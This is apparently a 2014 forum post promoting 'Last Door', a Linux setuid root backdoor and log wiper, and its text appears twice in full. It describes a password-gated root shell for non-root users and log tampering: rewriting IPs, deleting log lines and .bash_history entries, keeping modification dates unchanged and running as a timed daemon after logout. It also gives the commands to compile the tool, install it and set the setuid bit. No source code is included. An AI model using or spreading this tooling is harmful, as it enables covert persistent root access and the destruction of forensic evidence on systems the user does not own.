Last Door Log Wiper
3 February, 2014 - 15:07 — cisc0ninja
Last Door is a utility written to wipe specific entries in arbitrary log files and if setuid, will also execute arbitrary commands without logging any history.
___________
| |Linux
|<Last|Door>|Root-
| --------- |Backdoor
| O |&
| |Log-
| |Cleaner
|___________|~r0ng
Hackers2DevNull.blogspot.co.uk
(The user bears responsibility)
Release Dec 2012 -V1
For a full writeup of the program, please visit my blog, URL above.
[+] What is it?
It is a backdoor program which enables a non-root user to send root commands to system, and a log cleaner with several functions.
[+] Features?
- Hardcoded password, no prompt/blank screen unless correct password entered
- No need for user to SU prior to running
- Protection for virtual file systems
- All commands sent to system as root
- Log cleaner searches the file system for chosen strings, no finite log lists used
- Log cleaner options:
- Search string replace with new string (e.g. change your ip in the logs)
- Search string delete string
- Search string delete line
- Search string delete file contents
- Multi-string search/destroy at once
- Includes hidden files
- Maintains the file modified date despite making changes
- On running the log cleaner, the process is forked as a background daemon
- User sets timer prior to running so they can logout/exit, and it will clean up after you have gone.
- If you don't logout prior to the process starting, the file search process will be displayed
- If you do logout prior to the process starting this will allow your .bash_history to refresh
and be included in the search (shoud you want to delete your ./LastDoor command for example).
[+] Compile/use?
- gcc LastDoor.c -o LastDoor -Wall (all std libs used)
- cp LastDoor /bin/LastDoor (for example)
- chmod u+s /bin/LastDoor (set the s bit)
- non-rootuser:~# /bin/LastDoor (run!)
| |Linux
|<Last|Door>|Root-
| --------- |Backdoor
| O |&
| |Log-
| |Cleaner
|___________|~r0ng
Hackers2DevNull.blogspot.co.uk
(The user bears responsibility)
Release Dec 2012 -V1
For a full writeup of the program, please visit my blog, URL above.
[+] What is it?
It is a backdoor program which enables a non-root user to send root commands to system, and a log cleaner with several functions.
[+] Features?
- Hardcoded password, no prompt/blank screen unless correct password entered
- No need for user to SU prior to running
- Protection for virtual file systems
- All commands sent to system as root
- Log cleaner searches the file system for chosen strings, no finite log lists used
- Log cleaner options:
- Search string replace with new string (e.g. change your ip in the logs)
- Search string delete string
- Search string delete line
- Search string delete file contents
- Multi-string search/destroy at once
- Includes hidden files
- Maintains the file modified date despite making changes
- On running the log cleaner, the process is forked as a background daemon
- User sets timer prior to running so they can logout/exit, and it will clean up after you have gone.
- If you don't logout prior to the process starting, the file search process will be displayed
- If you do logout prior to the process starting this will allow your .bash_history to refresh
and be included in the search (shoud you want to delete your ./LastDoor command for example).
[+] Compile/use?
- gcc LastDoor.c -o LastDoor -Wall (all std libs used)
- cp LastDoor /bin/LastDoor (for example)
- chmod u+s /bin/LastDoor (set the s bit)
- non-rootuser:~# /bin/LastDoor (run!)